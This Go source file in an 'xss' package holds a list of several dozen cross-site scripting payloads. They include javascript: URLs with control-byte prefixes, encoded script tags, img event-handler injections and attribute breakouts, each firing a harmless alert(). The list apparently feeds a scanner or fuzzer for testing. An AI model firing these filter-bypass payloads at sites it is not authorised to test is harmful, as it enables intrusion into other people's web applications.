package xss

var (
	payloads = []string{
		`<a href=\"\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>`,
		`<a href=\"\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>`,
		`<a href=\"\xC2\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>`,
		`<a href=\"\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>`,
		`<a href=\"\xE1\xA0\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>`,
		`<a href=\"\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>`,
		`<a href=\"\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>`,
		`%253Cscript%253Ealert('XSS')%253C%252Fscript%253E`,
		`<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">`,
		`<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">`,
		`		/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />`,
		`"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />`,
		`"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />`,
		`"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />`,
		`<script\x2F>javascript:alert(1)</script>`,
		`<script\x20>javascript:alert(1)</script>`,
		`<script\x0D>javascript:alert(1)</script>`,
		`<script\x0A>javascript:alert(1)</script>`,
		`<script\x0C>javascript:alert(1)</script>`,
		`<script\x00>javascript:alert(1)</script>`,
		`<script\x09>javascript:alert(1)</script>`,
		`"><img src=x onerror=javascript:alert(1)>`,
		`"><img src=x onerror=javascript:alert('1')>`,
		`"><img src=x onerror=javascript:alert("1")>`,
		`"><img src=x onerror=javascript:alert(('1'))>`,
		`"><img src=x onerror=javascript:alert(("1"))>`,
		"\\<svg/onload=alert`1`\\>",
		"\"><img src=x onerror=javascript:alert((`1`))>",
		"\"><img src=x onerror=javascript:alert(`1`)>",
	}
)
